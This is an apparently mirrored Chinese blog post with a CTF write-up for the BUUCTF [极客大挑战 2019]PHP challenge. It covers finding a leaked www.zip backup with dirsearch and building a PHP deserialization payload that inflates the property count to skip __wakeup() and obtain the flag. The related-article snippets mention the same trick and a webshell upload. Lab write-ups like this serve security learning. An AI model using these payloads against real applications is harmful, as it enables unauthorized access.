×

注意!页面内容来自https://blog.csdn.net/MyZy_/article/details/143711097,本站不储存任何内容,为了更好的阅读体验进行在线解析,若有广告出现,请及时反馈。若您觉得侵犯了您的利益,请通知我们进行删除,然后访问 原网页

BUUCTF [极客大挑战 2019]PHP 1 解题思路

最新推荐文章于 2026-02-01 03:23:00 发布
原创 最新推荐文章于 2026-02-01 03:23:00 发布 · 1.5k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #网络安全 #安全 #系统安全 #web安全 #密码学 #安全架构

该文章已生成可运行项目,

[极客大挑战 2019]PHP 1

打开文件发现提示信息“备份文件”,查看源码并未发现其他有效信息

在这里插入图片描述

采用dirsearch爆破目录,找到www.zip文件

在这里插入图片描述

解压zip,发现是源码泄露

在这里插入图片描述

提交flag,发现不正确,看到index.php源码中有Get传参,然后反序列化函数unserialize(),判断为反序列化漏洞;

在这里插入图片描述

查看class.php可知,只要username=admin并且password=100,就能输出flag

在这里插入图片描述

于是构造反序列化payload

<?php
class Name{
    private $username = 'admin';
    private $password = '100';
}
$a= new Name();
$res=serialize(@$a);   
echo $res
?>

执行php方法序列化成字符串,Name前后需要添加%00

O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

在这里插入图片描述

作为select参数值,未能显示出flag

在这里插入图片描述

这是因为成员属性数目大于实际数目2时才可绕过wakeup魔术方法,修改2为任意大于二的数字

O:4:"Name":666:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

在这里插入图片描述

成功拿到flag

flag{2629c697-31da-4735-8e1f-978a34067a82}

tips.

unserialize();

方法解释:
从已存储的表示中创建 PHP 的值列化后的字符串。
若被反序列化的变量是一个对象,在成功地重新构造对象之后会自动地试图去调用 __wakeup()成员函数;
本文章已经生成可运行项目
确定要放弃本次机会?
福利倒计时
: :

立减 ¥

普通VIP年卡可用
立即使用
网络安全 | CTF】CTF极客挑战2019PHP解题详析(Dirsearch+php反序列化)
等风来
08-24 7908
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
BUUCTF-[极客挑战 2019]PHP 1
qq_57345310的博客
10-13 949
打开题目,首先是一只猫,真可爱。 首先我们根据题目提示,用dirsearch扫描目录。(按理说御剑也是可以的,但我没有尝试)但要注意,可能会扫不出来备份文件,多扫几次就出来了。如果没有dirsearch,上百度上搜,有很多安装教程和使用教程 最终我们扫到一个备份文件.www.zip 于是我们回到网页,拼接www.zip后就下载到了源码,解压后,可以看见里面有几个文件 但很可惜,flag.php文件里的flag是假的。但这里还是...
1 条评论 您还未登录,请先 登录 后发表或查看评论
[极客挑战 2019]PHP 1——php反序列化
weixin_51325053的博客
09-12 639
保存,然后获得序列化后的字符串:O:4:“Name”:2:{s:14:“Nameusername”;发现一段php文件,包含class.php文件,用get的方式传入一个select参数,并将结果反序列化(unserialize)我们将用这串序列化的字符串替换select,但问题是,当执行反序列(unserialize)时,会首先执行。在反序列化时,当前属性个数于实际属性个数时,就会跳过__wakeup(),去执行__destruct。于是,我们直接回到网页,然后拼接www.zip于是我们就下载了源码,
[极客挑战 2019]PHP1全网最详细 纯小白也能看懂
qq_51802152的博客
11-30 7407
[极客挑战 2019]PHP1全网最详细 纯小白也能看懂
[极客挑战 2019]PHP
最新发布
m0_56409644的博客
02-01 396
6.既然提示了class.php,再去看看这个文件,进入文件首先观察有什么入口,发现没好的入口,那么再返回到index.php观察,既然调用了反序列化,那么一定触发了_wakeup()魔术方法,然后在销毁时一定也触发了__destruct()魔术方法,我们再进class.php查找有没有相应的魔术方法。5.观察index源码,发现有用的如下图,这里的逻辑是先引用包含一个名为class.php的文件,然后$select以get方式提交并且关键的词是select,$res再对输入的select进行反序列化。
BUUCTF】[极客挑战 2019] PHP 清晰易懂详细总结 Writeup
algae
08-26 2429
BUUCTF】[极客挑战 2019] PHP Writeup0x00 考点目录扫描源码泄露反序列化0x01 解题 0x00 考点 目录扫描 源码泄露 反序列化 0x01 解题 dirsearch -u 指定url -e 指定网站语言 -w 可以加上自己的字典(加上路径) -r 递归跑(查到一个目录后,在目录后重复跑,很慢,不建议用) python3 dirsearch.py -u http://26e0c1d7-d98e-4a34-9ffe-901887297fb5.node3.buuoj.cn
[极客挑战 2019]PHP1-原创超详细
qq_58166735的博客
12-09 4129
php反序列化根据__destruct 析构函数(在这个对象的内容执行完之前 执行函数的内容)的内容可以得知,password=100,username=admin的时候满足条件就可以获得flag。扫出来www.zip这个文件,然后下载下来 ,里面只有index.php和class.php两个文件有作用。(img-WxhXrNIn-1670552259273)]但是发现这个里面有空格,所以把空格url编码变成%00再传参。我用的是top7777.txt字典,扫的很慢。获得flag,实验结束。
BUUCTF[极客挑战 2019]PHP1题解
cxm4545的博客
04-26 2673
想要得到flag,必须满足username===admin,password==100,于是我们就要绕过__wakeup()函数了。(Value是代码运行结果,这里要注意改一下参数个数以绕过__wakeup()函数)(1)进入靶机,我们看到网页提示:备份网站,这时候我们就应该想到有可能源码泄露了。很明显,用get传参,然后反序列化,其实这里就是一个反序列化的题目了。(5)在class.php中,我们观察一下这个Name类。(2)因此,写一个python脚本,扫描一下这个网站。(7)我们写一下代码。
BUUCTF_[极客挑战 2019]Http解题思路
时光不老的博客
01-10 749
[极客挑战 2019]Http
Buuctf-Web-[极客挑战 2019]EasySQL 1 题解及思路总结
热门推荐
m0_62239233的博客
09-16 2万+
SQL注入。
BUUCTF[极客挑战2019]Upload
weixin_45253622的博客
05-07 384
文件上传过滤和绕过 打开题目,发现了一个可以上传图片的上传点。 我们上传一句话木马试试; 会显示不是图片,我们BP抓包修改类型试试:(由于电脑把我的一句话删掉了,所以这里使用phtml来上传一句话木马) phtml就是嵌入php代码的html文件。 修改类型为:image/jpeg 放包发现: 盲猜后台上传地址为 http://52159d7e-a98b-453c-ab5e-6f3741dd9748.node3.buuoj.cn/upload/ 菜刀连接:http://5215
buuctf-[极客挑战 2019]BuyFlag题解
2301_81574836的博客
02-21 685
buuctf-[极客挑战 2019]BuyFlag题解
2025.2.11——一、[极客挑战 2019]PHP wakeup绕过|备份文件|代码审计
2402_87387800的博客
02-11 1318
题目来源:BUUCTF [极客挑战 2019]PHP
[极客挑战 2019]PHP 1
qq_43618536的博客
07-02 650
BUUCTF的[极客挑战 2019]PHP 1 反序列化
BUUCTF-[极客挑战 2019]PHP1
Monica的博客
09-27 4246
目录 题目: 知识点: 分析: 方法: 题目: 知识点: 1. __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过)我们可以通过一个cve来绕过:CVE-2016-7124。将Object中表示数量的字段改成比实际字段的值即可绕过wakeup函数。条件:PHP5 < 5.6.25,PHP7 < 7.0.10,或者PHP 7.3.4 2. __construct() //当对象被创建即new之前,会触发进行初始化,但在unseri...
[极客挑战 2019]PHP1
m0_62207480的博客
04-30 4490
知识点:1.网站的备份文件 2.php反序列化 发现三个php文件,其中index.php为主页源代码。 打开flag.php并未发现flag: 接着打开class.php: 里面涉及php魔法方法 __construct 是一种构造方法,在类实例化的时候,会自动调用该魔术方法,进行类的初始化; __wakeup 当使用unserialize时被调用,可用于做些对象的初始化操作 ...
BUU CTF---[极客挑战 2019]PHP 1
weixin_46685211的博客
05-04 1389
文章目录知识点一、备份网站二、代码审计1._wakeup()魔术方法2.GET方法3.类代码4.构造对象参考资料 知识点 1PHP反序列化 2、绕过魔术方法 __wakeup() 一、备份网站 查看界面,提示备份网站。则搜索下载网站的备份文件。写一个程序遍历常见的备份文件网址,发现其中/www,zip的response为200 import requests url = "url地址" l1 = ['web''website''backup''back''www''wwwroot
BUUCTF-[极客挑战 2019]PHP
网络空间安全学习
06-29 1188
通过第二个if控制语句,我们发现通过正则表达式过滤掉了flag,所有说file参数传入时,如果有flag出现就会被过滤掉,我们再根据下一句话,文件包含,我们尝试去获取useless.php 的源码,看是什么信息,再次构造payload。发现是网页的源码,经过分析可得,三个参数分别为text,file,password通过get方式进行传参,在if控制语句当中,设置text变量,并在文件当中读取数据,要等于welcome to the zjctf才会返回true。:私有的类成员则只能被其定义所在的类访问。
buuctf极客挑战2019phpeasy
03-20
以下是针对 **BUUCTF 2019 PHP Easy** 的可能解题思路。 --- #### 反序列化漏洞基础 在 PHP 中,`serialize()` 和 `unserialize()` 函数分别用于对象的序列化和反序列化操作。如果开发者未对用户可控的数据进行...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

TazmiDev

写文章不容易,充充电吧~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
< type="text/css">
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值